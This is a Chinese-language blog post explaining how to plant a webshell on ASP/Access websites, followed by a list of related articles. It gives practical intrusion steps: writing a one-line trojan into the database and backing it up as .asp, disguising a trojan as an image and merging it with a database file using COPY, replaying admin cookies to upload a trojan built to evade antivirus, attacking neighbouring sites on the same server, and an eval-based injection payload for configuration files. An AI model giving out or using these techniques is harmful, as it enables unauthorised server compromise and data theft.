概念

Webshell就是以asp,php,jsp或cgi等网页文件形式存在的一种命令执行环境,也可以将其称为一种网页后门。

Access数据库拿webshell

  1. 首先看是否能找到网站漏洞进行网站的后台(sql注入等)或者通过扫描工具来看看是否网站有文件上传漏洞(在没拿到后台)。
  2. 进入后台后,看看是否有数据库备份功能。

    a)   如果有数据库备份功能,用一句话木马。通过各种方法,把这句话写入到数据库,再把写入这句话的数据库通过备份变为后缀名为.asp的文件,当然要注意备份后的文件地址,然后进行访问,如果显示乱码,基本上成功了,然后通过一句话木马客户端进行连接,就连接出现乱码的那个页面,连接成功后,就可以看到webshell了。

    b)   用图片上传功能。我们把asp木马的后缀改为图片的后缀名,如GIF,JPG,BMP之类的,进行上传,上传成功后,会提示上传成功,并且会给出文件位置;有时候可能不会提示,我们可以通过抓包工具进行抓包(如WSockExpert),抓到上传的路径;然后通过数据库备份的功能,把gif等图片的格式变为asp格式的数据库,进行访问,这时候我们通常就可以看到我们的WebShell了!但是目前目前有的网站会对这个进行检测,如果备份文件检查不出属于数据库,则会提示“不合法的数据库”,既然要检测是否有数据库特征,那我们把图片加入数据库特征就可以了,我们可以通过DOS的COPY命令给图片加上数据库特征了,命令如下:COPY 木马图片.gif 数据库文件.mdb 合成后的文件.gif,这样,我们合成的图片就带有数据库的特征了!

  1. 如果网站后台我们找不到数据库备份的地方,上面的方法就不管用了。我们解决方案是:找到一个上传功能的页面,随便上传什么东西,用抓包工具对上传过程进行抓包,一般我们点击上传之后,在抓包工具中就会找到上传ASP页面和相应的COOKIES了,在这里我们肯定是先进入后台,用管理员的账号进行上传,得到COOKIES就是管理员的了,这是我们用明小子的上传功能,选择上传的页面,就是我们抓包得到的页面,填上得到的COOKIES,选择我们要上传的木马(要免杀的),点击上传,当程序提示成功时,我们就可以对自己的WebShell进行访问了!如果失败就换别的类型试试。
  2. 有时候上面方法可能没法拿到webshell,那么可以尝试旁注的方法对同一台服务器的网站拿webshell,然后提权拿到整台服务器,再对我们的目标网站进行入侵就可以了。

在网站配置文件中,我可以修改其中的数据通过burp suite来抓包,可以抓包网站配置文件的路径,网站路径可以通过对其特殊符号的闭合达到插入一句话。

  实施过程:准备一句话---闭合特殊符号---找到链接文件     ("%><%eval request("pass")%><%s=")       一般是在inc/config中。

拿webshell权限方法(一)的更多相关文章

  1. 2017-2018-2 20155303『网络对抗技术』Final:Web渗透获取WebShell权限

    2017-2018-2 『网络对抗技术』Final:Web渗透获取WebShell权限 --------CONTENTS-------- 一.Webshell原理 1.什么是WebShell 2.We ...

  2. nginx去掉单个目录和多个目录PHP执行权限方法

    我们经常希望某些目录不能执行php代码,如果是nginx的话,我们怎么设置Nginx对于某些目录禁止执行PHP权限呢.以前不知道,其实nginx去掉单个目录和多个目录PHP执行权限方法也很简单. 首先 ...

  3. MySQL数据库设置远程访问权限方法小结

    http://www.jb51.net/article/42441.htm MySQL基础知识第一期,如何远程访问MySQL数据库设置权限方法总结,讨论访问单个数据库,全部数据库,指定用户访问,设置访 ...

  4. webshell检测方法归纳

    背景 webshell就是以asp.php.jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门.黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB ...

  5. mssql拿webshell的方法

    首先检测下MSSQL数据库的用户权限,一般有两种,一种是SA权限,这种权限很大,还有一种是DB_OWNER权限,这个权限赋给用户一些对数据库的修改.删除.新增数据库表,执行部分存储过程的权限.但是涉及 ...

  6. Linaro系统获取root权限方法

    在Zedboard上根据教程安装Linaro Ubuntu后出现一只无法获取Root权限,导致无法挂载U盘等问题. 具体体现在sudo -s命令之后,出现如sudo:must be setuid ro ...

  7. linux服务器上使用find查杀webshell木马方法

    本文转自:http://ju.outofmemory.cn/entry/256317 只要从事互联网web开发的,都会碰上web站点被入侵的情况.这里我把查杀的一些方法采用随记的形式记录一下,一是方便 ...

  8. dedecms入侵拿webshell之方法总结

    1.注入漏洞 存在注入地址:在域名下输入plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var ...

  9. Xamarin.Android 6.0以后开启权限方法

    Android 6.0 版本以上一些危险权限只能在运行的时候依次询问用户是否赋予,所以在开发的时候使用 RequestPermissions 方法单独请求所需要的权限. 代码: //开启相机权限 if ...

随机推荐

  1. 【Mysql】—— MySQL存储引擎中的MyISAM和InnoDB区别详解

    在使用MySQL的过程中对MyISAM和InnoDB这两个概念存在了些疑问,到底两者引擎有何分别一直是存在我心中的疑问.为了解开这个谜题,搜寻了网络,找到了如下信息: MyISAM是MySQL的默认数 ...

  2. Luogu3835 【模板】可持久化平衡树(fhq-treap)

    fhq-treap,也即非旋treap,可以在不进行旋转操作的前提下维护treap.由于不需要旋转,可以对其可持久化. fhq-treap的基本操作是merge和split,并且通过这两个操作实现对t ...

  3. BZOJ1041 HAOI2008圆上的整点(数论)

    求x2+y2=r2的整数解个数,显然要化化式子.考虑求正整数解. y2=r2-x2→y2=(r-x)(r+x)→(r-x)(r+x)为完全平方数→(r-x)(r+x)/d2为完全平方数,d=gcd(r ...

  4. 修改input的text 通过jquery的html获取值 未变化

    修改input的text 通过jquery的html获取值 未变化扩展一个方法 ,通过formhtml()来取代html() (function ($) { var oldHTML = $.fn.ht ...

  5. 自学Aruba2.1-Aruba Web UI --Dashbord面板介绍

    点击返回:自学Aruba之路 自学Aruba2.1-Aruba Web UI --Dashbord面板介绍 本文所有设计的的controller版本信息如下:  Aruba7205 V6.4.4.16 ...

  6. 自学Python5.1-面向对象与面向过程

    自学Python之路 自学Python5.1-面向对象与面向过程 面向过程:根据业务逻辑从上到下写代码. 优点:性能比面向对象高,因为类调用时需要实例化,开销比较大,比较消耗资源;比如单片机.嵌入式开 ...

  7. 【HDU1693】Eat the Trees(插头dp)

    [HDU1693]Eat the Trees(插头dp) 题面 HDU Vjudge 大概就是网格图上有些点不能走,现在要找到若干条不相交的哈密顿回路使得所有格子都恰好被走过一遍. 题解 这题的弱化版 ...

  8. [转载]C++的顺序点(sequence point)和副作用(side effect)

    有关i=(++i)+(i++)这种东西的深入解释,不仅仅是简单粗暴undefined behavior. ==== 一.副作用(side effect) 表达式有两种功能:每个表达式都产生一个值( v ...

  9. SPI接口扫盲 SPI定义/SPI时序(CPHA CPOL)

    SPI接口扫盲   douqingl@gmail.com   为何要写这篇文档?百度上找出来的SPI接口中文描述都说的太过简略,没有一篇文档能够详尽的将SPI介绍清楚的.wikipedia英文版[注释 ...

  10. ORMLite学习入门笔记

    ORMLite学习入门笔记 使用原始的SQLiteHelper来操作维护数据库有点过于繁琐,重复工作量较大.所以会想到使用一个比较方便的ORM来维护我们本地的数据库,各位业界前辈都给我推荐了ORMLi ...